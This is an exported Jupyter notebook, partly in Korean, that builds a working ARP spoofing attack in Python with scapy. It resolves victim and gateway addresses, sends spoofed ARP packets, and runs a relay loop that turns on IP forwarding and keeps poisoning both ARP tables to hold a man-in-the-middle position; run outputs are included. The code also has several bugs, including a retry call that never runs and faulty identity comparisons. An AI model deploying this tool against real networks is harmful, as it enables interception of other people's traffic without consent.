# ARP Spoofing with python
----

import 들

In [28]:
from scapy.all import *
from uuid import getnode
import socket
import ipaddress
import os
import sys
import argparse
import signal
import logging
import time

root인지 check.

In [2]:
#You should be root.
if os.geteuid() != 0:
        sys.exit("Please run as root") 

---
## 1. Send 1 ARP spoofing packet to victim.

We need victim's ip, victim's mac and Gateway's ip, mac.
Also, my ip and mac.
We will find out those through arp packet.
    
* get_my_address : 자신의 ip와 mac을 구해온다.
* get_gateway_address : gateway address를 구해온다.
* get_mac_by_ARP : ip에 대해 arp request를 보내서 mac address를 구해온다.

`p=sr1(ARP(op=ARP.who_has, pdst=dstip))`를 통해 destination ip에 관해 arp request를 보내고, 그에 대한 reply를 받은 p를 바로 return받을 수 있다.

In [13]:
#function to get host's ip, mac address
#return ip address, mac address
def get_my_address():

    #using getnode
    mac = "".join(c + ":" if i % 2 else c for i, c in enumerate(hex(getnode())[2:].zfill(12)))[:-1]
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("gmail.com",80))
    ip = s.getsockname()[0]

    return ip, mac

#really bad idea. just put 1 at last 4byte, but work nicely in my computer!!
def get_gateway_address(ip):

    li = ip.split('.')
    res = li[0] + '.' + li[1] + '.' + li[2] + '.' + '1'
 
    return res

#send arp request packet, and get answer from that to figure out mac address.
def get_mac_by_ARP(dstip):
    #sr1 is function that can request and response simultaniously.
    p=sr1(ARP(op=ARP.who_has, pdst=dstip),timeout=2.0)
    if not (p is None):
        return p.hwsrc
    else:
        return (-1)    


In [24]:
#send arp spoofed packet.
#src_mac should be our mac, src_ip should be gateway, destination is victim's
def send_ARPreply(src_mac, src_ip, dst_mac, dst_ip):

    packet = Ether()/ARP(op="who-has",hwsrc=src_mac,psrc=src_ip,pdst=dst_ip)
 
    sendp(packet)
    return packet

### Integration

In [26]:
def ARP_spoofing():
    
    my_ip, my_mac = get_my_address()
    gateway_ip = get_gateway_address(my_ip)
    gateway_mac = get_mac_by_ARP(gateway_ip)

    print "Your ip address is : " , my_ip , "\nYour mac address is : " , my_mac
    print "Gateway's ip address is : " , gateway_ip, "\nGateway's mac address is : ", gateway_mac

    victim_ip = raw_input("Please enter Victim's ip address(XXX.XXX.XXX.XXX) : ")
    victim_mac = get_mac_by_ARP(victim_ip)
    if not (victim_mac is -1):
        print "Victim's ip address is : ", victim_ip, "\nVictim's mac address is : ", victim_mac
        send_ARPreply(my_mac, gateway_ip, victim_mac, victim_ip)
        return 1
    else:
        print "Timeout. Maybe ", victim_ip, "is not exist"
        check = raw_input("If you want to try again, Enter y.")
        if check is "y":
            ARP_spoofing
        else:
            return -1
    
    


In [27]:
ARP_spoofing()


Received 2 packets, got 1 answers, remaining 0 packets
Your ip address is :  192.168.0.176 
Your mac address is :  ac:bc:32:86:66:e9
Gateway's ip address is :  192.168.0.1 
Gateway's mac address is :  00:08:9f:b5:d0:14
Begin emission:
Finished to send 1 packets.
Please enter Victim's ip address(XXX.XXX.XXX.XXX) : 123.123.123.123



Received 1 packets, got 0 answers, remaining 1 packets
Timeout. Maybe  123.123.123.123 is not exist
Begin emission:
Finished to send 1 packets.
If you want to try again, Enter y.n


-1

---
## 2. ARP spoofing relay.

Spoofing relay is needed to keep victim's arp table poisoned.
* 중간에서 실제 패킷의 교환이 가능하게끔 할 것.
* 주기적으로 spoofing packet을 보낼 것.

### python을 이용한 arp spoofing packet relay 예시

Reference : [참조 링크](http://cpuu.postype.com/post/41330/)


In [40]:
# sudo python arp_spoof.py -v 192.168.0.3 -r 192.168.0.1

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

def poison(routerIP, victimIP, routerMAC, victimMAC):
    send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
    send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))

def restore(routerIP, victimIP, routerMAC, victimMAC):
    send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
    send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
    sys.exit("losing...")

def get_Input():
    
    victim_ip = raw_input("Please enter Victim's ip address(XXX.XXX.XXX.XXX) : ")
    victim_mac = get_mac_by_ARP(victim_ip)
    if not (victim_mac is -1):
        print "Victim's ip address is : ", victim_ip, "\nVictim's mac address is : ", victim_mac      
    else:
        print "Timeout. Maybe ", victim_ip, "is not exist"
        check = raw_input("If you want to try it again, Enter y.")
        if check is "y":
            get_Input()
        else:
            return None

    gateway_ip = get_gateway_address(my_ip)
    gateway_mac = get_mac_by_ARP(gateway_ip)
    
    return gateway_ip, victim_ip, gateway_mac, victim_mac

def ARP_spoofRelay():
    if os.geteuid() != 0:
        sys.exit("[!] Please run as root")
    
    routerIP, victimIP, routerMAC, victimMAC = get_Input()
    if(routerIP is 1):
        sys.exit("Fail to get. Closing....")
    print "-----------------------------------------------"
    print 'routerIP : ' + routerIP
    print 'victimIP : ' + victimIP
    print 'routerMAC : ' + routerMAC
    print 'victimMAC : ' + victimMAC
    if routerMAC == None:
        sys.exit("Could not find router MAC address. Closing....")
    if victimMAC == None:
        sys.exit("Could not find victim MAC address. Closing....")
    with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
        ipf.write('1\n')
    def signal_handler(signal, frame):
        with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
            ipf.write('0\n')
        restore(routerIP, victimIP, routerMAC, victimMAC)
    signal.signal(signal.SIGINT, signal_handler)
    while 1:
        poison(routerIP, victimIP, routerMAC, victimMAC)
        time.sleep(1.5)

In [42]:
args = get_Input()
if args is not None:
    ARP_spoofRelay(args)
else:
    print "Closing....."

Please enter Victim's ip address(XXX.XXX.XXX.XXX) : 123.123.123.123

Received 3 packets, got 0 answers, remaining 1 packets
Timeout. Maybe  123.123.123.123 is not exist
Begin emission:
Finished to send 1 packets.
If you want to try it again, Enter y.n
Closing.....
